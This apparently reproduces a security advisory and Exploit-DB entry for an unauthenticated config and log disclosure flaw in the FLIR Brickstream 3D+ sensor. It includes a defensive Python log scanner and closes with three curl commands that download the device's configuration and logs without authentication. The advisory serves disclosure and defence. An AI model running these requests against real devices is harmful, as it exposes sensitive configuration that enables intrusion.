Vendor: FLIR Brickstream 3D+
By: Gjoko 'LiquidWorm' Krstic
CVSS: 8.8 (HIGH)
Title: Unauthenticated Config Download and File Disclosure
CWE: 200
Product Name: FLIR Brickstream 3D+
Affected Version From: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif: 0.1.1.47
Affected Version To: Titan, Api/1.0.0
Patch Exists: YES
Related CWE: ZSL-2018-5495
CPE: h:flir:brickstream_3d+
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

FLIR Brickstream 3D+ 2.1.742.1842 – Config File Disclosure

The FLIR Brickstream 3D+ sensor allows unauthenticated config download and file disclosure when the ExportConfig REST API (getConfigExportFile.cgi) is called. This lets an attacker disclose sensitive information, which can help in authentication bypass, privilege escalation and/or full system access.

Mitigation:

Ensure that the system is configured to require authentication before allowing access to the ExportConfig REST API.
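
To check whether the export endpoints have been served without authentication, the following added example (not part of the advisory or any vendor code) scans access logs for such requests. It assumes a reverse proxy or gateway in front of the sensor that writes Common Log Format lines; the function name find_unauth_exports and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Export endpoints named in the advisory, lower-cased for a conservative match.
EXPORT_PATHS = {
    "/getconfigexportfile.cgi",
    "/restapi/system/exportconfig",
    "/restapi/system/exportlogs",
}

# Common Log Format (assumed): host ident authuser [time] "request" status size
CLF = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def normalise(target):
    """Drop the query string, decode %xx, collapse slashes, lower-case."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).rstrip("/").lower()

def find_unauth_exports(lines):
    """Return requests where an export endpoint answered 2xx with no auth user."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line, skip it
        path = normalise(m["target"])
        if path not in EXPORT_PATHS:
            continue
        if m["status"].startswith("2") and m["user"] == "-":
            hits.append({"src": m["src"], "time": m["ts"],
                         "path": path, "bytes": m["size"]})
    return hits

# Constructed sample log lines, not taken from a real device.
SAMPLE = [
    '10.0.0.23 - - [14/Oct/2018:10:01:02 +0000] "GET /getConfigExportFile.cgi HTTP/1.1" 200 48211',
    '10.0.0.23 - - [14/Oct/2018:10:01:09 +0000] "GET //restapi/system/ExportLogs?x=1 HTTP/1.1" 200 90312',
    '10.0.0.7 - admin [14/Oct/2018:10:05:00 +0000] "GET /restapi/system/ExportConfig HTTP/1.1" 200 48211',
    '10.0.0.40 - - [14/Oct/2018:10:06:00 +0000] "GET /restapi/system/ExportConfig HTTP/1.1" 401 0',
    '10.0.0.40 - - [14/Oct/2018:10:07:00 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in find_unauth_exports(SAMPLE):
        print(hit)
```

A hit means the export was delivered to a client the proxy did not authenticate; once authentication is enforced, the same requests should appear with a 401 or 403 status and produce no hits.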

Exploit-DB raw data:

# Exploit Title: FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: http://www.brickstream.com
# Affected version: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif: 0.1.1.47
# Tested on: Titan, Api/1.0.0
# References:
# ZSL-2018-5495
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php

# Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
# download and file disclosure vulnerability when calling the ExportConfig REST
# API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
# information and help her in authentication bypass, privilege escalation and/or
# full system access.

$ curl http://192.168.2.1:8083/getConfigExportFile.cgi
$ curl http://192.168.2.1:8083/restapi/system/ExportConfig
$ curl http://192.168.2.1:8083/restapi/system/ExportLogs